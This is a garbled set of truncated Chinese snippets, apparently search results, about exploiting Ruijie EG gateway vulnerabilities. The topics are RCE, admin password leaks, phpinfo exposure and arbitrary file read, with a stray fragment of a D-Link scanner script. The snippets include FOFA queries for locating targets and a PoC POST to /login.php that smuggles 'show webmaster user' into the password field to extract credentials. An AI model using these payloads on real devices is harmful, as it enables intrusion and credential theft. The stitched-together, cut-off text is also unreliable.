首先登录到后台中(可以组合 锐捷EG易网关 管理员账号密码泄露漏洞) 漏洞文件 cli.php <?php /** * cli命令查询 */ define('IN', true); //定位该文件是入口文件 define('DS', DIRECTORY_SEPARATOR); define('AROOT', dirname(__FILE__) . DS); include_once(AROOT . 'mvc' . DS . 'controller...
之前提交过一次锐捷RG-EG系列出口网关的逻辑漏洞,最近几天有时间再次审计一下,这次主要针对WEB管理端的登录功能进行审计。锐捷RG-EG系列的出口网关是网络设备,类似这种网络设备一般都会内置web管理端,网络设备最主要的是设备功能,从而导致开发者在web端的逻辑设计方面存在疏忽,造成漏洞的产生。这次审计最终成功找到了前台...
漏洞影响 锐捷EG易网关 FOFA app="Ruijie-EG易网关" 漏洞复现 登录页面如下 漏洞文件 login.php <?php /** * 用户登录处理 */ define('IN', true); //定位该文件是入口文件 define('DS', DIRECTORY_SEPARATOR); define('AROOT', dirname(__FILE__) . DS); class defaultController { function __con...
7 changes: 7 additions & 0 deletions 7 锐捷-EG易网关存在RCE漏洞.md Original file line numberDiff line numberDiff line change @@ -1,4 +1,11 @@ ## 锐捷-EG易网关存在RCE漏洞 ## fofa ``` app="Ruijie-EG易网关" ``` ## poc ``` 获取用户密码 POST /login.php HTTP/1.1 0 comments ...
## 锐捷-EG易网关存在RCE漏洞 ``` 获取用户密码 POST /login.php HTTP/1.1 Host: 10.10.10.10 User-Agent: Go-http-client/1.1 Content-Length: 49 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Accept-Encoding: gzip username=admin&password=admin?show+webmaster+user...
锐捷EG易网关 部分版本 phpinfo.view.php文件权限设定存在问题,导致未经身份验证获取敏感信息 漏洞影响 锐捷EG易网关 FOFA app="Ruijie-EG易网关" 漏洞复现 查看源码发现phpinfo文件 访问url /tool/view/phpinfo.view.php 锐捷EG易网关 download.php 任意文件读取漏洞锐捷 EG易网关 管理员账号密码泄露漏洞...
首先登录到后台中(可以组合 锐捷EG易网关 管理员账号密码泄露漏洞) 漏洞文件 branch_passw.php <?php /** * 分支密码的统一管理 */ define('IN', true); //定位该文件是入口文件 define('DS', DIRECTORY_SEPARATOR); //定义系统目录分隔符 define('AROOT', dirname(__FILE__) . DS); //定义入口所...
insert(END,"【!!!】存在漏洞的url:" + url + "\n") dcs_admin_passwd_leak_text.see(END) with open ("存在D-Link DCS系列监控 账号密码信息泄露漏洞的url.txt", 'a') as f: f.write(url + "\n") else: dcs_admin_passwd_leak_text.insert(END,"【×】不存在漏洞的url:" + url + "\...
Showing1 changed filewith7 additionsand0 deletions. Whitespace Ignore whitespace Split Unified 7 changes: 7 additions & 0 deletions7锐捷-EG易网关存在RCE漏洞.md Original file line numberDiff line numberDiff line change @@ -1,4 +1,11 @@ ...
首先登录到后台中(可以组合 锐捷EG易网关 管理员账号密码泄露漏洞) 漏洞文件 download.php <?php /** * 文件下载 */ define('IN', true); //定位该文件是入口文件 define('DS', DIRECTORY_SEPARATOR); define('AROOT', dirname(__FILE__) . DS); include_once(AROOT . 'mvc' . DS . 'controller...